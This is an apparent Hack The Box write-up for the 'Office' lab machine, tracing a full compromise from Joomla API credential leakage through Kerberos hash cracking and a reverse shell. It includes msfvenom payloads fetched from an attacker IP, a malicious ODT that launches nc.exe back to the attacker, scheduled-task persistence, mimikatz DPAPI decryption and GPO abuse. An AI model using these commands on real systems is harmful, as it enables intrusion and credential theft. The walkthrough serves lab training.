Skip to content
Hack The Box5 min read

HTB - Office

Office - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



HTB - Office#

bash
nmap 10.129.22.81 -Pn -p- -T5

image1

bash
sudo nmap -sUV -T4 -F --version-intensity 0 10.129.22.81

image2

bash
nmap 10.129.22.81 -A -sC

image3

  • Add office.htb to /etc/hosts

  • Subdomain enumeration:

bash
gobuster dns -d office.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r office.htb:53

image4

  • Extension search on office.htb:
bash
dirsearch -u http://office.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -t 50

image5

/robots.txt

image6

  • Directory search - same as robots.txt

dirsearch -u http://office.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50

image7

  • Dirsearch the https:
bash
dirsearch -u https://office.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50

image8

/joomla

image9

https://office.htb/joomla/

image10

  • Given administrator - it asks to touch the security key So we know administrator is a valid user

image11

  • Did another dirsearch on the http domain:

image12

  • Joomla version:

image13

  • The tool Juumla can come in handy to search for vulnerabilities:

image14

<u>CVE-2023-23752:</u>

  • Googling this version - it has a vulnerability:

CVE-2023-23752

https://vulncheck.com/blog/joomla-for-rce

image15

  • To test for vulnerability:
bash
curl -v http://office.htb/api/index.php/v1/config/application?public=true

image16

image17

image18

  • Joomla SQL DB credentials: root : H0lOgrams4reTakIng0Ver754!

  • The SQL DB is only exposed on the localhost so we can't do anything remotely but the password might be reused for something else

  • Leak the user database:

bash
curl -v http://office.htb/api/index.php/v1/users?public=true

image19

"name":"Tony Stark","username":"Administrator","email":"Administrator@holography.htb"

  • Vind valid users:
bash
./kerbrute userenum --dc 10.129.23.162 -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o validusers.txt

cat validusers.txt | grep "VALID" | cut -d ":" -f 4 | cut -d " " -f 2 > users.txt
  • See if any of them are vulnerable to ASRepRoasting:
bash
impacket-GetNPUsers office.htb/ -users validusers.txt -no-pass -dc-ip 10.129.23.162

image20

But none are

  • Extract the usernames:

image21

  • Check all the users against the password found for the Joomla SQL DB:
bash
crackmapexec smb 10.129.23.162 -u users.txt -p "H0lOgrams4reTakIng0Ver754\!"

image22

We find a valid user.

bash
smbmap -H office.htb -u <user_found> -p "H0lOgrams4reTakIng0Ver754\!"

image23

bash
enum4linux -u "<user_found>" -p "H0lOgrams4reTakIng0Ver754\!" -a office.htb

(The -a IP/host, needs to come at the end)

image24

  • Domain users:

image25

  • Bind to SOC Analysis is OK:

image26

  • Domain Groups:

image27

  • Connect to share:
bash
smbclient -U <user_found>%H0lOgrams4reTakIng0Ver754! \\\\office.htb\\"SOC Analysis"

image28

  • Download the PCAP

Go to: Statistics -> Protocol Hierarchy

image29

  • Apply Kerberos as Filter

image30

image31

  • Following the stream:

image32

  • The first line (no.1908) has the smallest length (so least amount of data): The padata-value tree doesn't have extra information

image33

  • Clicking on the one that has the biggest length (no.1917). Expand all Kerberos subtrees:

image34

  • Go down to Kerberos -> as-req -> padata -> PA-DATA pA-ENC-TIMESTAMP -> padata-type -> padata-value -> cipher

  • We get the hash:

image35

  • Copy the value:

image36

Hash Type: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)

(Kerberos 5, etype 18, Pre-Auth )

Hash: a16f4806da…….a3765386f5fc

image37

  • First we need to change it to the right format - Using the details from the TCP stream and the hashcat wiki:

**$krb5pa$18$tstark$OFFICE.HTB$**a16f4806da…….a3765386f5fc

  • Crack with hashcat:
bash
hashcat -m 19900 -a 0 hash /usr/share/wordlists/rockyou.txt

image38

  • Found credentials: tstark : <password>

From previous enumeration, we know:

  • The login page for the Joomla Administration

http://office.htb/administrator

  • The user Tony Stark (tstark) was leaked from the Joomla database as a SuperUser and his username is Administrator

  • The password for Administrator is therefore the same as tstark's password.

  • Login:

image39

  • We are met with the admin panel:

image40

  • Go to: System -> Templates -> Site Templates -> "Template name" (Cassiopeia Details and Files) -> error.php

image41

image42

image43

image44

  • To get a reverse shell on the Windows box:

  • Edit error.php and add in the PHP Ivan Sincek rev shell:

  • Make sure Shell: powershell

  • image45

    • Set up listener
  • Navigate to http://office.htb/templates/cassiopeia/error.php

  • We have a shell as web_account:

image46

bash
whoami /all

image47

  • More stable meterpreter shell:
bash
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.66 LPORT=4445 -f exe -o shell.exe
  • Upload meterpreter shell to target :
bash
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.66:8082/shell.exe', 'C:\xampp\htdocs\joomla\templates\cassiopeia\shell.exe')
bash
upload RunasCs.exe
  • Create another meterpreter reverse shell on a different port and upload it:
bash
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.66 LPORT=4447 -f exe -o shell2.exe

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.66:8082/shell2.exe', 'C:\Users\Public\Downloads\shell2.exe')
  • Set up meterpreter multi/handler listener

  • Run:

bash
RunasCs.exe tstark <password>".\shell2.exe"

image48

  • We are user tstark:

image49

image50

bash
query user

image51

Ppotts has a session open

  • LibreOffice on a Domain Controller stands out (as well as this room being called Office)

image52

  • Get the version:
powershell
$libreofficeInstallPath = "C:\Program Files\LibreOffice 5"
$libreofficeVersion = (Get-Item "$libreofficeInstallPath\program\soffice.bin").VersionInfo.FileVersion
Write-Host "LibreOffice Version: $libreofficeVersion"

image53

Git clone and use the py script to create a malicious file:

bash
python3 CVE-2023-2255.py --cmd "C:\users\Public\nc.exe 10.10.14.66 5555 -e powershell" --output form.odt

image54

It injects it in contents.xml:

image55

  • Upload nc.exe to the target

  • Running netstat -pant on the victim we can see:

image56

A webserver running on port 8083

  • <u>Create a pivot into the internal network:</u>

  • Upload chisel to the victim

  • On Kali:

bash
chisel server -p 8888 --reverse
  • On target:
bash
.\chisel.exe client 10.10.14.66:8888 R:socks
  • Use proxychains on Kali:
bash
proxychains nmap office.htb -Pn -sT -vvv
  • Or to use a browser (if there was an internal web server):
    • Download Foxyproxy
    • Add a proxy - SOCKS5 127.0.0.1:1080

image57

  • Accessing the internal webserver

image58

  • We can upload a form (the malicious form we made):

image59

image60

  • Set up a listener

  • Wait for someone to open the form

  • Shell as ppotts:

image61

whoami /priv

image62

He has SeMachineAccountPrivilege set.

  • Persistence in case we lose the session:
bash
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.66; set lport 4449; exploit"
bash
schtasks /create /sc minute /mo 1 /tn "a_innocent" /tr "C:\users\Public\shellppotts.exe" /ru "ppotts"

<u>Crack DPAPI stored credentials:</u>

  • From cmd:
bash
vaultcmd /listcreds:"Windows Credentials" /all

image63

  • From mimikatz
bash
vault::list

image64

image65

So if it isn't in the directory that mimikatz says, look in the other directories as well

The files will be hidden, so doing ls or dir won't show anything

image66

To view hidden items do:

bash
Get-Childitem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials

image67

  • In Mimikatz:
bash
dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

Everything is still encrypted but we need to find the correlating Maskterkey (guidMasterKey)

image68

image69

image70

Like this:

image71

Here we can see the Masterkey that matches up - 191d3f9d-7959-4b4d-a520-a444853c47eb

  • The cache is empty atm:
bash
dpapi::cache

image72

  • Now decrypt the masterkey:
bash
dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
  • Looking at the cache now:

image73

  • Now we can decrypt the encrypted credentials:
bash
dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166

image74

  • Each of the files will hold some form of credentials

UserName : OFFICE\HHogan

CredentialBlob : <password>

  • Login with WinRM:
bash
evil-winrm -i 10.129.24.92 -u hhogan -p "<password>"

image75

bash
whoami /all

image76

Hhogan is part of the GPO Managers

  • Upload Sharphound and run:
bash
.\SharpHound.exe --CollectionMethods All --Domain office.htb --ZipFileName loot.zip
  • Looking in BloodHound: GPO Managers has GenericWrite to the Default Domain Controller Policy.

image77

bash
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "DEFAULT DOMAIN CONTROLLERS POLICY"

OR

bash
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author office.htb\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators hhogan /add" --GPOName "DEFAULT DOMAIN CONTROLLERS POLICY"

(The first one seems to stay whereas this second command, the user gets wiped from the admin group after a few minutes)

bash
gpupdate /force
  • Check localgroup:
bash
net localgroup administrators

image78

  • HHogan is now part of the local Administrators group:

image79

  • Trying to access to root.flag in the Administrator's directory we get this:

image80

  • Close the current evil-winrm session and just relaunch it, and:

image81

Hack The Box5 min

HTB - Sizzle

Sizzle - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

  • bloodhound
  • hashcat
  • impacket
  • linux
  • mimikatz
Hack The Box5 min

HTB - Freelancer

Freelancer - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

  • bloodhound
  • impacket
  • kerberos
  • linux
  • mimikatz
Hack The Box8 min

HTB - Analysis

Analysis - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

  • gobuster
  • impacket
  • ldap
  • linux
  • nmap